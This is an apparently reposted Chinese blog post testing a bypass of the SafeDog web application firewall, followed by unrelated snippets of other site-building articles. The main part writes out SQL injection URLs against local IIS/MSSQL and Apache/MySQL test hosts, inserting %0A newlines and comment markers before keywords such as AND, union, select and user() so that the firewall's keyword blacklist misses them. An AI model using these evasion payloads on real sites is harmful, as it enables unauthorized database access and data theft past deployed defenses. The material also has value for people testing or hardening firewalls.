php网站安全狗绕过,网站安全狗最新版绕过测试

news/2024/5/20 8:36:23/文章来源:https://blog.csdn.net/weixin_33279554/article/details/115411215

测试时间:2014.10.21

测试版本:IIS版V3.3.09476(2014-09-24)、Apache V3.1.08512(2014-05-29),均为今天能下到的最新版。

用于绕过的核心字符:%0A,某些特殊场合需要和注释符配合使用。

测试详细步骤:

1、本机安装了存在注入的V5shop(构架为IIS6+ASPX+MSSQL2005,以测试IIS版本的安全狗),常规注入测试:

Default

http://192.168.91.152/cart.aspx?act=buy&id=1 AND 1=user

1

http://192.168.91.152/cart.aspx?act=buy&id=1 AND 1=user

7207176309f56931c24017adf2bc7f4e.png

AND作为关键字被识别并拦截。

2、加入%0A再次尝试:

Default

http://192.168.91.152/cart.aspx?act=buy&id=1%0AAND 1=user

1

http://192.168.91.152/cart.aspx?act=buy&id=1%0AAND 1=user

406ed4bd18c407556be53ea0dc859ba8.png

成功绕过并实现注入。

另外:在Apache+php+Mysql环境中:

先按常规进行注入尝试:

Default

http://192.168.91.152:8000/About.php?did=2 and/**/(select user())=”

1

http://192.168.91.152:8000/About.php?did=2 and/**/(select user())=”

b312df366c792e7c9e6a9ff11797a1a4.png

因为and、user()均为黑名单里的关键字。那么我们加入%0A再次尝试:

Default

http://192.168.91.152:8000/About.php?did=2%0Aand/**/(select%0Auser())=”

http://192.168.91.152:8000/About.php?did=2%0Aand/**/(select%0Auser())=’root@localhost’

1

2

3

http://192.168.91.152:8000/About.php?did=2%0Aand/**/(select%0Auser())=”

http://192.168.91.152:8000/About.php?did=2%0Aand/**/(select%0Auser())=’root@localhost’

712dfafc5678b60a6497fc2d23a9fa44.png

当然,%0A只是一个思路,由此发散开来便是多个%0A叠加,或者与注释符–、/**/混合使用。比如:

Default

http://192.168.91.152:8000/About.php?did=-2%0Aunion--%0Aselect%0Auser()

1

http://192.168.91.152:8000/About.php?did=-2%0Aunion--%0Aselect%0Auser()

b7de7d3312f739d68f6f362297a557ca.png

成功绕过,毫无压力 。

此方法仅供学习研究,切勿用于非法用途。若需转载,请保留版权(STD兄弟连)

另:测试用到的安全狗版本已打包:http://pan.baidu.com/s/1c05v54k (包含了IIS和Apache版本)

[via@phpsec]

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.luyixian.cn/news_show_792700.aspx

如若内容造成侵权/违法违规/事实不符,请联系dt猫网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

网站启用URL重定向后.原本的静态文件打不开的解决方案

最近网站用了重定向.自己总结几个问题.(纯粹写给自己看的) 1.ActionlessForm.cs以重写Form的方式用于处理PostBack回发后URL变为原始地址 web.config的配置 <httpModules> <add type"ruonanxiao.Config.ModuleRewriter, ruonanxiao.Config" name"Mod…

网站配色杂谈

BgcolorΚ″#F1FAFA″———做正文的背景色好&#xff0c;淡雅    BgcolorΚ″#E8FFE8″———做标题的背景色较好    BgcolorΚ″#E8E8FF″———做正文的背景色较好&#xff0c;文字颜色配黑色   BgcolorΚ″#8080C0″———上配白色文字较好    BgcolorΚ″#E8D0…

域名已备案提示你访问的是临时域名_已备案的老域名对于建站有哪些优势?

搭建网站的前提是需要一个域名&#xff0c;那么一个已备案的老域名对于建站都有哪些优势呢&#xff1f;什么叫老域名&#xff1f;顾名思义&#xff0c;就是一个拥有多年建站历史的&#xff0c;由于某种原因域名过期&#xff0c;可供他人抢注的域名。当我们在域名抢注时&#xf…

【特别推荐】10款唯美浪漫的婚礼 结婚纪念网站模板

互联网的重要性不言而喻&#xff0c;如今我们的生活已经完全离不开网络。这里给大家分享一组唯美浪漫的结婚邀请网站以及婚礼请柬网站模板&#xff0c;如果你也正想制作这样的网站&#xff0c;相信这些漂亮的网站模板能够带给你很大的帮助&#xff0c;让你快速创建出自己的网站…

网站收集页---

https://rxjs-dev.firebaseapp.com/guide/overview http://www.ofmonkey.com/front/rem http://validform.club/index.html 做移动端项目多的话&#xff0c;可以看看这个 移动web开发适配秘籍Rem https://www.imooc.com/learn/942 https://rxjs-dev.firebaseapp.com/guide/ov…

将整个网站变灰

2019独角兽企业重金招聘Python工程师标准>>> 为方便站点哀悼&#xff0c;特提供素装代码&#xff0c;以表哀悼。以下为全站CSS代码。 html { filterrogidXImageTransform.Microsoft.BasicImage(grayscale1); } 使用方法&#xff1a;这段代码可以变网页为黑白&#x…

使用BeautifulSoup爬取“0daydown”网站的信息(2)——字符编码问题解决

2019独角兽企业重金招聘Python工程师标准>>> 上篇中的程序实现了抓取0daydown最新的10页信息&#xff0c;输出是直接输出到控制台里面。再次改进代码时我准备把它们写入到一个TXT文档中。这是问题就出来了。 最初我的代码如下&#xff1a; #-*- coding: utf-8 -*- #…

荷露叮咚wp建站系列视频课程.3WordPress功能菜单介绍

安装后的WordPress在E:\xampp\apps\wordpress\htdocs(历史版本有在E:\xampp\htdocs目录下的情况)&#xff0c;将E:\xampp\apps\wordpress\htdocs目录下的wordpress文件夹拷至E:\xampp\htdocs目录也是可以的。 常用功能&#xff08;按常规操作先后顺序&#xff09;&#xff1a; …

利用 squid 反向代理提高网站性能原理总结

2019独角兽企业重金招聘Python工程师标准>>> 本文在介绍 squid 反向代理的工作原理的基础上&#xff0c;指出反向代理技术在提高网站访问速度&#xff0c;增强网站可用性、安全性方面有很好的用途。作者在具体的实验环境下&#xff0c;利用 DNS 轮询和 Squid 反向代…

初创企业如何用SEO打造百度品牌专区

品牌对于企业的重要性不言而喻。为打造品牌而花去的市场费用&#xff0c;占去了公司营销费用的大部分。而作为网络营销中的一个非常有效的渠道&#xff0c;百度也成为多数公司&#xff0c;宣传品牌的一个首选平台。对于创业公司&#xff0c;品牌的宣传需求非常迫切。但“预算少…

IIS服务管理器无法启动网站的解决方法

如图&#xff1a; 启动网站时提示无法启动网站&#xff0c;由于windows Activation Services或者w3svc均未启动。解决方法&#xff1a; 找到World Wide Web Publishing Service服务项&#xff0c;没有启动&#xff0c;右键点击启动。原文地址:http://bbs.delit.cn/thread-742-1…

vba获取正在运行网站的源码_利用运行按钮,从模块(Module)运行代码

窗体是学习VBA人员最为感兴趣的部分&#xff0c;“VBA之EXCEL应用”从简单的录制宏实现一直讲到窗体的搭建&#xff0c;大家可以非常容易的掌握相关的知识&#xff0c;这套教程面向初学人员&#xff0c;共三册&#xff0c;十七章&#xff0c;都是我们在利用EXCEL工作过程中需要…

php语音提示_用php监控被采集网站内容并在有结果时播报语音提示

有时候为了监控某些网站的更新情况&#xff0c;又不想自己一直刷新网页在那盯着&#xff0c;就用PHP写了一个监控脚本&#xff0c;配合使用AJAX及HTML5的audio实现监控到我想的结果时自动播放语音提示。费话不多说&#xff0c;直接上代码&#xff1a;index.phpheader("Con…

网站资源

2019独角兽企业重金招聘Python工程师标准>>> http://www.zhihu.com/question/20382142 3dprinter http://www.3dprinter-diy.com/portal.php 小蚂蚁 http://www.3dxmy.com/ 天工社 http://maker8.com/portal.php 3D打印实践论坛 http://www.03dp.com 转载于:https:/…

网站优化怎么做?老鸟实战经验交给你

2019独角兽企业重金招聘Python工程师标准>>> 网站优化怎么做&#xff1f;老鸟实战经验交给你 网站收录&#xff0c;索引量一直不大&#xff0c;排名靠后&#xff0c;有些原创文章也不收录&#xff0c;您是否想过网站本身的优化存在很大问题&#xff1f;中国网页设计…

【.NET】网站的打包与发布

网站发布 1、打开VS&#xff0c;右击UI层&#xff0c;点击发布Web应用 2、选择自定义&#xff0c;然后设置网站名&#xff0c;点击下一页 3、发布方法选择“文件系统”&#xff0c;目标URL选择自己网站想要放的位置&#xff0c;然后新建一个名为Website的文件夹&#xff0c;放…

爱心点击特效php代码,网站鼠标点击爱心特效源码

只要点击网站页面就会跳出不同颜色的爱心。效果图代码如下:!function(e, t, a) {function r() {for (var e 0; e < s.length; e) s[e].alpha < 0 ? (t.body.removeChild(s[e].el), s.splice(e, 1)) : (s[e].y--, s[e].scale .004, s[e].alpha - .013, s[e].el.style.c…

直接访问静态图片_什么是云开发静态网站托管能力?

随着云开发用户的数量不断增多&#xff0c;开发者们对于云开发的使用程度越来越深&#xff0c;不少开发者提出了疑问&#xff0c;云开发除了支持小程序以外&#xff0c;还能支持其他平台么&#xff1f;答案是肯定的&#xff01;云开发刚刚正式发布了静态网站托管能力&#xff0…

Linux系统重启或无故变为只读造成网站无法正常访问的简单临时的做 根目录只读不能写处理:...

2019独角兽企业重金招聘Python工程师标准>>> Linux系统重启或无故变为只读造成网站无法正常访问的简单临时的做 根目录只读不能写处理&#xff1a; 一、 1、mount: 用于查看哪个模块输入只读&#xff0c;一般显示为&#xff1a; /dev/hda1 on / type ext3 (rw) none…

你想要创建一个属于自己的网站吗?十大免费网站

目录 WordPress Docsify Dumi img Cook Ant design landing 腾讯兔小巢 百度统计 ​编辑 onenav Discuz 后台管理 github 搜一下admin&#xff0c;按star 排序 WordPress 是一个开源的建站系统&#xff0c;可创建个人博客、企业官网、电商平台&#xff0c;并且…